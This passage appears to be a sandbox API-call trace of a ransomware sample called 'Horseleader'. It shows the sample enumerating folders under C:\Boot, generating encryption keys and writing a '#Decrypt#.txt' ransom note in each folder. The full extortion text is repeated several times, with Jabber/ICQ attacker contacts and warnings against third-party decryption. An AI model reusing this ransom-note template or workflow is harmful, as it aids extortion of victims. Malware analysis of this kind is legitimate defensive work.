the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.734] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.736] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.737] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.737] CloseHandle (hObject=0x1dc) returned 1 [0124.738] GetProcessHeap () returned 0x780000 [0124.739] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.739] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0124.739] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0124.739] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0124.739] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0124.739] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0124.740] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.740] GetProcessHeap () returned 0x780000 [0124.740] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.740] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0124.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.741] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.741] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0124.741] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.741] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.742] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.742] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0124.742] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.742] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.742] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.742] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.742] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0124.743] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.743] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.743] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.743] lstrlenW (lpString=".testttjffg") returned 11 [0124.743] StrStrW (lpFirst="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.743] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.744] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.744] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.744] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.744] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.744] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\#Decrypt#.txt") returned 31 [0124.745] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\#Decrypt#.txt" (normalized: "c:\\boot\\nl-nl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.745] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.745] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.747] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.747] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.747] CloseHandle (hObject=0x1dc) returned 1 [0124.749] GetProcessHeap () returned 0x780000 [0124.749] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.749] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0124.749] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0124.749] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0124.749] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0124.749] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0124.749] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.750] GetProcessHeap () returned 0x780000 [0124.750] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.750] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0124.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.751] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.751] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0124.751] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.751] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.751] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.751] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0124.752] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.752] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.752] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.752] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.752] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0124.752] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.752] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.753] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.753] lstrlenW (lpString=".testttjffg") returned 11 [0124.753] StrStrW (lpFirst="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.753] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.826] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.827] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.827] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\#Decrypt#.txt") returned 31 [0124.827] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\#Decrypt#.txt" (normalized: "c:\\boot\\pl-pl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.828] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.828] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.830] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.830] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.830] CloseHandle (hObject=0x1dc) returned 1 [0124.830] GetProcessHeap () returned 0x780000 [0124.830] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.831] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0124.831] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0124.831] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0124.831] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0124.831] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0124.831] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.832] GetProcessHeap () returned 0x780000 [0124.832] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.832] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0124.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.833] lstrcmpiW 